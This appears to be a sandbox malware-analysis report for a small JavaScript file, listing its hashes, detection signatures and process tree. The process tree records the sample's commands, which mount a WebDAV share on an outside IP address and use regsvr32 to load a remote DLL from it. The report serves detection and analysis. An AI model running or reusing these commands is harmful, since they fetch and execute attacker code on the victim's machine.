Analysis
-
max time kernel
15s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
-
submitted
10/07/2024, 22:35
General
-
Target
2362313565781516725.js
-
Size
5KB
-
MD5
ad11a8c365332019253eacf65046bcbc
-
SHA1
80291bb0a6c44ac903a71340e31d7d5425f90749
-
SHA256
e933ca12b57e64a87cbf02dd5630c48cec4fc1796dd676bcf34fd1d32ca8101c
-
SHA512
260997341d1b6075e1676a1d85be310c3ee848e881d95b96abf0f986cfd76f07027ff3ae1256c10fb75c7b0892efa5aacee1872e641aa83b6b18a8b188d2bdc6
-
SSDEEP
96:7hDCqEsCLafxW1/8UIAn/8US4VmnJeHLkpa7s7LPFid6Fi0P2sRFidvdiYa2kHa1:7hdUWWQAD8GZs7odzox+dv0YHkHy
Score
3/10
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
-
Suspicious use of WriteProcessMemory 11 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2362313565781516725.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\2362313565781516725.js" "C:\Users\Admin\\vujtwv.bat" && "C:\Users\Admin\\vujtwv.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\601.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5ad11a8c365332019253eacf65046bcbc
SHA180291bb0a6c44ac903a71340e31d7d5425f90749
SHA256e933ca12b57e64a87cbf02dd5630c48cec4fc1796dd676bcf34fd1d32ca8101c
SHA512260997341d1b6075e1676a1d85be310c3ee848e881d95b96abf0f986cfd76f07027ff3ae1256c10fb75c7b0892efa5aacee1872e641aa83b6b18a8b188d2bdc6